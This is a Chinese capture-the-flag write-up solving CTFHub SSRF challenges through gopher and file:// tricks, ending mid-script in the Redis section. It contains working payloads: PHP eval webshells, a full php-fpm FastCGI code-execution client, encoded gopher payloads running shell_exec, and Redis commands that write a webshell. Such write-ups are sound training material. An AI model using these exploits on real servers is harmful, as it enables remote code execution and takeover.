内网访问
题目:
尝试访问位于127.0.0.1的flag.php吧
解题步骤
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q8SNkmpj-1627361928135)(C:\Users\1stPeak\AppData\Roaming\Typora\typora-user-images\image-20210727113128471.png)]](https://img-blog.csdnimg.cn/109c10dba6cb49428baf6bc756ebd195.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxNjE3MDM0,size_16,color_FFFFFF,t_70)
伪协议读取文件
题目:
尝试去读取一下Web目录下的flag.php吧尝试去读取一下Web目录下的flag.php吧
解题步骤
端口扫描
题目:
来来来性感CTFHub在线扫端口,据说端口范围是8000-9000哦,
根据提示对目标端口进行爆破
注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来
POST请求
注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可
题目:
这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年
解题步骤
根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php
http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php
<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=e64d3284e9a8b1a4c3e3dcdf7d08a495-->
</form>
flag.php源码
<?php
error_reporting(0);
if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") {
echo "Just View From 127.0.0.1";
return;
}
$flag=getenv("CTFHUB");
$key = md5($flag);
if (isset($_POST["key"]) && $_POST["key"] == $key) {
echo $flag;
exit;
}
?>
<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>
302.php源码
http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/302.php
返回404,可能环境有些许问题了,然后直接在wp中找到源码,如下
<?php
if(isset($_GET['url'])){
header("Location: {$_GET[‘url‘]}");
exit;
}
highlight_file(__FILE__);
index.php源码
http://challenge-d01e92afbf6aa96c.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php
源码如下:
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])){
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
根据flag.php的源码,我们使用gopher://协议进行传输
修改请求包相关信息如下
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
key=e64d3284e9a8b1a4c3e3dcdf7d08a495
因为要使用gopher://协议,所以变换一下,如下所示格式
POST /flag.php HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 36回车换行key=e64d3284e9a8b1a4c3e3dcdf7d08a495
转变之后,将所有除英文字母外所有符号url编码2次
POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Ddd6942a5f13090a3ef0daa507d70fd98
其中%0d表示回车,%0a表示换行
其中回车的作用只是移动光标至该行的起始位置,换行至下一行行首起始位置
所以上面的%250D%250A%250D%250A需要这样写,在请求包中,如下所示的换行,是先回车,后换行的结果
注:Content-Length长度需要和传入内容的长度相等
关于URL编码
假设对/进行2次URL编码,有以下两种表达方式
第一种:%25%32%66
这种常见于bp,用在这里是不行的,不要使用bp自带的url编码,踩过坑,用下面第二种url编码格式
第二种:%252f
因为%的url编码是%25,所以第1次编码,甚至3次,n次编码可以只将%进行编码即可,有时这种编码比第一种好用
文件上传
题目:
这次需要上传一个文件到flag.php了.祝你好运
file://协议访问flag.php
<?php
error_reporting(0);
if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
echo "Just View From 127.0.0.1";
return;
}
if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
echo getenv("CTFHUB");
exit;
}
?>
上传却没有确定按钮,修改html代码
<input type="submit" value="提交">
上传一句话木马文件,然后抓包
上传文件时抓包
POST /flag.php HTTP/1.1
Host: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------6494119058275
Content-Length: 228
-----------------------------6494119058275
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
<?php @eval($_REQUEST[peak]);?>
-----------------------------6494119058275--
请求包一次换行和两次换行都需要进行两次url编码
换行二次编码
两层换行:%250d%250a%250d%250a
一层换行:%250d%250a
编码如下
POST /flag.php HTTP/1.1%250d%250a
Host: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250a
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0%250d%250a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%250d%250a
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%250d%250a
Accept-Encoding: gzip, deflate%250d%250a
Referer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250a
DNT: 1%250d%250a
Connection: close%250d%250a
Upgrade-Insecure-Requests: 1%250d%250a
Content-Type: multipart/form-data; boundary=---------------------------6494119058275%250d%250a
Content-Length: 228%250d%250a%250d%250a
-----------------------------6494119058275%250d%250a
Content-Disposition: form-data; name="file"; filename="2.php"%250d%250a
Content-Type: application/octet-stream%250d%250a%250d%250a
<?php @eval($_REQUEST[peak]);?>%250d%250a
-----------------------------6494119058275--
调整好后payload如下:
?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1%250d%250aHost: challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250aUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0%250d%250aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8%250d%250aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3%250d%250aAccept-Encoding: gzip, deflate%250d%250aReferer: http://challenge-a9b240db05937d0d.sandbox.ctfhub.com:10800%250d%250aDNT: 1%250d%250aConnection: close%250d%250aUpgrade-Insecure-Requests: 1%250d%250aContent-Type: multipart/form-data; boundary=---------------------------6494119058275%250d%250aContent-Length: 228%250d%250a%250d%250a-----------------------------6494119058275%250d%250aContent-Disposition: form-data; name="file"; filename="2.php"%250d%250aContent-Type: application/octet-stream%250d%250a%250d%250a
<?php @eval($_REQUEST[peak]);?>%250d%250a-----------------------------6494119058275--
FastCGI协议
题目:
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助
解题步骤
1、使用kali监听本地传入的包
nc -lvvp 9000 | hexdump -C > 1.txt
如下所示:
2、使用脚本对目标进行传包
脚本地址:
https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75
下不了的,我把脚本贴出来
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
def bchr(i):
if PY2:
return force_bytes(chr(i))
else:
return bytes([i])
def bord(c):
if isinstance(c, int):
return c
else:
return ord(c)
def force_bytes(s):
if isinstance(s, bytes):
return s
else:
return s.encode('utf-8', 'strict')
def force_text(s):
if issubclass(type(s), str):
return s
if isinstance(s, bytes):
s = str(s, 'utf-8', 'strict')
else:
s = str(s)
return s
class FastCGIClient:
"""A Fast-CGI Client for Python"""
# private
__FCGI_VERSION = 1
__FCGI_ROLE_RESPONDER = 1
__FCGI_ROLE_AUTHORIZER = 2
__FCGI_ROLE_FILTER = 3
__FCGI_TYPE_BEGIN = 1
__FCGI_TYPE_ABORT = 2
__FCGI_TYPE_END = 3
__FCGI_TYPE_PARAMS = 4
__FCGI_TYPE_STDIN = 5
__FCGI_TYPE_STDOUT = 6
__FCGI_TYPE_STDERR = 7
__FCGI_TYPE_DATA = 8
__FCGI_TYPE_GETVALUES = 9
__FCGI_TYPE_GETVALUES_RESULT = 10
__FCGI_TYPE_UNKOWNTYPE = 11
__FCGI_HEADER_SIZE = 8
# request state
FCGI_STATE_SEND = 1
FCGI_STATE_ERROR = 2
FCGI_STATE_SUCCESS = 3
def __init__(self, host, port, timeout, keepalive):
self.host = host
self.port = port
self.timeout = timeout
if keepalive:
self.keepalive = 1
else:
self.keepalive = 0
self.sock = None
self.requests = dict()
def __connect(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(self.timeout)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# if self.keepalive:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
# else:
# self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
try:
self.sock.connect((self.host, int(self.port)))
except socket.error as msg:
self.sock.close()
self.sock = None
print(repr(msg))
return False
return True
def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
length = len(content)
buf = bchr(FastCGIClient.__FCGI_VERSION) \
+ bchr(fcgi_type) \
+ bchr((requestid >> 8) & 0xFF) \
+ bchr(requestid & 0xFF) \
+ bchr((length >> 8) & 0xFF) \
+ bchr(length & 0xFF) \
+ bchr(0) \
+ bchr(0) \
+ content
return buf
def __encodeNameValueParams(self, name, value):
nLen = len(name)
vLen = len(value)
record = b''
if nLen < 128:
record += bchr(nLen)
else:
record += bchr((nLen >> 24) | 0x80) \
+ bchr((nLen >> 16) & 0xFF) \
+ bchr((nLen >> 8) & 0xFF) \
+ bchr(nLen & 0xFF)
if vLen < 128:
record += bchr(vLen)
else:
record += bchr((vLen >> 24) | 0x80) \
+ bchr((vLen >> 16) & 0xFF) \
+ bchr((vLen >> 8) & 0xFF) \
+ bchr(vLen & 0xFF)
return record + name + value
def __decodeFastCGIHeader(self, stream):
header = dict()
header['version'] = bord(stream[0])
header['type'] = bord(stream[1])
header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
header['paddingLength'] = bord(stream[6])
header['reserved'] = bord(stream[7])
return header
def __decodeFastCGIRecord(self, buffer):
header = buffer.read(int(self.__FCGI_HEADER_SIZE))
if not header:
return False
else:
record = self.__decodeFastCGIHeader(header)
record['content'] = b''
if 'contentLength' in record.keys():
contentLength = int(record['contentLength'])
record['content'] += buffer.read(contentLength)
if 'paddingLength' in record.keys():
skiped = buffer.read(int(record['paddingLength']))
return record
def request(self, nameValuePairs={}, post=''):
if not self.__connect():
print('connect failure! please check your fasctcgi-server !!')
return
requestId = random.randint(1, (1 << 16) - 1)
self.requests[requestId] = dict()
request = b""
beginFCGIRecordContent = bchr(0) \
+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
+ bchr(self.keepalive) \
+ bchr(0) * 5
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
beginFCGIRecordContent, requestId)
paramsRecord = b''
if nameValuePairs:
for (name, value) in nameValuePairs.items():
name = force_bytes(name)
value = force_bytes(value)
paramsRecord += self.__encodeNameValueParams(name, value)
if paramsRecord:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)
if post:
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)
self.sock.send(request)
self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
self.requests[requestId]['response'] = b''
return self.__waitForResponse(requestId)
def __waitForResponse(self, requestId):
data = b''
while True:
buf = self.sock.recv(512)
if not len(buf):
break
data += buf
data = BytesIO(data)
while True:
response = self.__decodeFastCGIRecord(data)
if not response:
break
if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
if requestId == int(response['requestId']):
self.requests[requestId]['response'] += response['content']
if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
self.requests[requestId]
return self.requests[requestId]['response']
def __repr__(self):
return "fastcgi connect host:{} port:{}".format(self.host, self.port)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
parser.add_argument('host', help='Target host, such as 127.0.0.1')
parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)
args = parser.parse_args()
client = FastCGIClient(args.host, args.port, 3, 0)
params = dict()
documentRoot = "/"
uri = args.file
content = args.code
params = {
'GATEWAY_INTERFACE': 'FastCGI/1.0',
'REQUEST_METHOD': 'POST',
'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
'SCRIPT_NAME': uri,
'QUERY_STRING': '',
'REQUEST_URI': uri,
'DOCUMENT_ROOT': documentRoot,
'SERVER_SOFTWARE': 'php/fcgiclient',
'REMOTE_ADDR': '127.0.0.1',
'REMOTE_PORT': '9985',
'SERVER_ADDR': '127.0.0.1',
'SERVER_PORT': '80',
'SERVER_NAME': "localhost",
'SERVER_PROTOCOL': 'HTTP/1.1',
'CONTENT_TYPE': 'application/text',
'CONTENT_LENGTH': "%d" % len(content),
'PHP_VALUE': 'auto_prepend_file = php://input',
'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
response = client.request(params, content)
print(force_text(response))
命令如下:
python fpm.py -c "<?php var_dump(shell_exec('ls /')); ?>" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php
3、访问1.txt文件
4、将1.txt中的内容处理一下,删除不必要的内容
5、对修改后的内容进行两次url编码
import urllib.parse
a='''
01 01 be 70 00 08 00 00 00 01 00 00 00 00 00 00
01 04 be 70 01 e7 00 00 0e 02 43 4f 4e 54 45 4e
54 5f 4c 45 4e 47 54 48 33 38 0c 10 43 4f 4e 54
45 4e 54 5f 54 59 50 45 61 70 70 6c 69 63 61 74
69 6f 6e 2f 74 65 78 74 0b 04 52 45 4d 4f 54 45
5f 50 4f 52 54 39 39 38 35 0b 09 53 45 52 56 45
52 5f 4e 41 4d 45 6c 6f 63 61 6c 68 6f 73 74 11
0b 47 41 54 45 57 41 59 5f 49 4e 54 45 52 46 41
43 45 46 61 73 74 43 47 49 2f 31 2e 30 0f 0e 53
45 52 56 45 52 5f 53 4f 46 54 57 41 52 45 70 68
70 2f 66 63 67 69 63 6c 69 65 6e 74 0b 09 52 45
4d 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30
2e 31 0f 1b 53 43 52 49 50 54 5f 46 49 4c 45 4e
41 4d 45 2f 75 73 72 2f 6c 6f 63 61 6c 2f 6c 69
62 2f 70 68 70 2f 50 45 41 52 2e 70 68 70 0b 1b
53 43 52 49 50 54 5f 4e 41 4d 45 2f 75 73 72 2f
6c 6f 63 61 6c 2f 6c 69 62 2f 70 68 70 2f 50 45
41 52 2e 70 68 70 09 1f 50 48 50 5f 56 41 4c 55
45 61 75 74 6f 5f 70 72 65 70 65 6e 64 5f 66 69
6c 65 20 3d 20 70 68 70 3a 2f 2f 69 6e 70 75 74
0e 04 52 45 51 55 45 53 54 5f 4d 45 54 48 4f 44
50 4f 53 54 0b 02 53 45 52 56 45 52 5f 50 4f 52
54 38 30 0f 08 53 45 52 56 45 52 5f 50 52 4f 54
4f 43 4f 4c 48 54 54 50 2f 31 2e 31 0c 00 51 55
45 52 59 5f 53 54 52 49 4e 47 0f 16 50 48 50 5f
41 44 4d 49 4e 5f 56 41 4c 55 45 61 6c 6c 6f 77
5f 75 72 6c 5f 69 6e 63 6c 75 64 65 20 3d 20 4f
6e 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 4f 4f 54
2f 0b 09 53 45 52 56 45 52 5f 41 44 44 52 31 32
37 2e 30 2e 30 2e 31 0b 1b 52 45 51 55 45 53 54
5f 55 52 49 2f 75 73 72 2f 6c 6f 63 61 6c 2f 6c
69 62 2f 70 68 70 2f 50 45 41 52 2e 70 68 70 01
04 be 70 00 00 00 00 01 05 be 70 00 26 00 00 3c
3f 70 68 70 20 76 61 72 5f 64 75 6d 70 28 73 68
65 6c 6c 5f 65 78 65 63 28 27 6c 73 20 2f 27 29
29 3b 20 3f 3e 01 05 be 70 00 00 00 00
'''
a=a.replace('\n','').replace(' ','')
b=''
length=len(a)
for i in range(0,length,2):
b+='%'+a[i]+a[i+1]
#print(b)
print(urllib.parse.quote(b))
6、使用编码后的payload找到flag文件
http://challenge-4806028dae109d0e.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:9000/_%2501%2501%2595%2575%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2595%2575%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2537%2536%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%2595%2575%2500%2500%2500%2500%2501%2505%2595%2575%2500%254c%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2568%2565%256c%256c%255f%2565%2578%2565%2563%2528%2527%2563%2561%2574%2520%252f%2566%256c%2561%2567%255f%2566%2534%2534%2562%2562%2531%2562%2562%2565%2561%2562%2532%2534%2531%2539%2564%2536%2566%2566%2531%2562%2566%2539%2565%2538%2532%2530%2530%2536%2566%2561%2566%2527%2529%2529%253b%2520%253f%253e%2501%2505%2595%2575%2500%2500%2500%2500
7、使用同样方法,制作访问该flag的payload
nc -lvvp 9000 | hexdump -C > 2.txt
python fpm.py -c "<?php var_dump(shell_exec('cat /flag_f44bb1bbeab2419d6ff1bf9e82006faf')); ?>" -p 9000 127.0.0.1 /usr/local/lib/php/PEAR.php
import urllib.parse
a='''
01 01 95 75 00 08 00 00 00 01 00 00 00 00 00 00
01 04 95 75 01 e7 00 00 0e 02 43 4f 4e 54 45 4e
54 5f 4c 45 4e 47 54 48 37 36 0c 10 43 4f 4e 54
45 4e 54 5f 54 59 50 45 61 70 70 6c 69 63 61 74
69 6f 6e 2f 74 65 78 74 0b 04 52 45 4d 4f 54 45
5f 50 4f 52 54 39 39 38 35 0b 09 53 45 52 56 45
52 5f 4e 41 4d 45 6c 6f 63 61 6c 68 6f 73 74 11
0b 47 41 54 45 57 41 59 5f 49 4e 54 45 52 46 41
43 45 46 61 73 74 43 47 49 2f 31 2e 30 0f 0e 53
45 52 56 45 52 5f 53 4f 46 54 57 41 52 45 70 68
70 2f 66 63 67 69 63 6c 69 65 6e 74 0b 09 52 45
4d 4f 54 45 5f 41 44 44 52 31 32 37 2e 30 2e 30
2e 31 0f 1b 53 43 52 49 50 54 5f 46 49 4c 45 4e
41 4d 45 2f 75 73 72 2f 6c 6f 63 61 6c 2f 6c 69
62 2f 70 68 70 2f 50 45 41 52 2e 70 68 70 0b 1b
53 43 52 49 50 54 5f 4e 41 4d 45 2f 75 73 72 2f
6c 6f 63 61 6c 2f 6c 69 62 2f 70 68 70 2f 50 45
41 52 2e 70 68 70 09 1f 50 48 50 5f 56 41 4c 55
45 61 75 74 6f 5f 70 72 65 70 65 6e 64 5f 66 69
6c 65 20 3d 20 70 68 70 3a 2f 2f 69 6e 70 75 74
0e 04 52 45 51 55 45 53 54 5f 4d 45 54 48 4f 44
50 4f 53 54 0b 02 53 45 52 56 45 52 5f 50 4f 52
54 38 30 0f 08 53 45 52 56 45 52 5f 50 52 4f 54
4f 43 4f 4c 48 54 54 50 2f 31 2e 31 0c 00 51 55
45 52 59 5f 53 54 52 49 4e 47 0f 16 50 48 50 5f
41 44 4d 49 4e 5f 56 41 4c 55 45 61 6c 6c 6f 77
5f 75 72 6c 5f 69 6e 63 6c 75 64 65 20 3d 20 4f
6e 0d 01 44 4f 43 55 4d 45 4e 54 5f 52 4f 4f 54
2f 0b 09 53 45 52 56 45 52 5f 41 44 44 52 31 32
37 2e 30 2e 30 2e 31 0b 1b 52 45 51 55 45 53 54
5f 55 52 49 2f 75 73 72 2f 6c 6f 63 61 6c 2f 6c
69 62 2f 70 68 70 2f 50 45 41 52 2e 70 68 70 01
04 95 75 00 00 00 00 01 05 95 75 00 4c 00 00 3c
3f 70 68 70 20 76 61 72 5f 64 75 6d 70 28 73 68
65 6c 6c 5f 65 78 65 63 28 27 63 61 74 20 2f 66
6c 61 67 5f 66 34 34 62 62 31 62 62 65 61 62 32
34 31 39 64 36 66 66 31 62 66 39 65 38 32 30 30
36 66 61 66 27 29 29 3b 20 3f 3e 01 05 95 75 00
00 00 00
'''
a=a.replace('\n','').replace(' ','')
b=''
length=len(a)
for i in range(0,length,2):
b+='%'+a[i]+a[i+1]
#print(b)
print(urllib.parse.quote(b))
8、使用payload查看flag内容
http://challenge-4806028dae109d0e.sandbox.ctfhub.com:10800/?url=gopher://127.0.0.1:9000/_%2501%2501%2595%2575%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2595%2575%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2537%2536%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%2595%2575%2500%2500%2500%2500%2501%2505%2595%2575%2500%254c%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2568%2565%256c%256c%255f%2565%2578%2565%2563%2528%2527%2563%2561%2574%2520%252f%2566%256c%2561%2567%255f%2566%2534%2534%2562%2562%2531%2562%2562%2565%2561%2562%2532%2534%2531%2539%2564%2536%2566%2566%2531%2562%2566%2539%2565%2538%2532%2530%2530%2536%2566%2561%2566%2527%2529%2529%253b%2520%253f%253e%2501%2505%2595%2575%2500%2500%2500%2500
注意:如果使用的是nc -lvvp 9000 > 3.txt格式而不是nc -lvvp 9000 | hexdump -C > 2.txt格式,那么需要使用hexdump -C获取txt文件内容,否则会造成内容不一样,导致payload无法利用,对比下面两幅图就知道了,其中第二幅图中获取的txt内容才可获得flag
Redis
题目:
这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!
解题
访问:?url=file:///var/www/html/index.php得到index.php源码
<?php
error_reporting(0);
if (!isset($_REQUEST['url'])) {
header("Location: /?url=_");
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);
redis写webshell:
flushall
set 1 '<?php eval($_GET["cmd"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save
使用如下脚本,将上面的写webshell代码转化为redis RESP协议的格式
import urllib
from urllib import parse
protocol = "gopher://"
ip = "127.0.0.1"
port = "6379"
shell = "\n\n<?php eval($_GET[\"peak\"]);?>\n\n"
filename = "peak.php"
path = "/var/www/html"
passwd = ""
cmd = ["flushall",
"set 1 {}".format(shell.replace(" ", "${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0, "AUTH {}".format(passwd))
payload_prefix = protocol + ip + ":" + port + "/_"
CRLF = "\r\n"
def redis_format(arr):
redis_arr = arr.split(" ")
cmd_ = ""
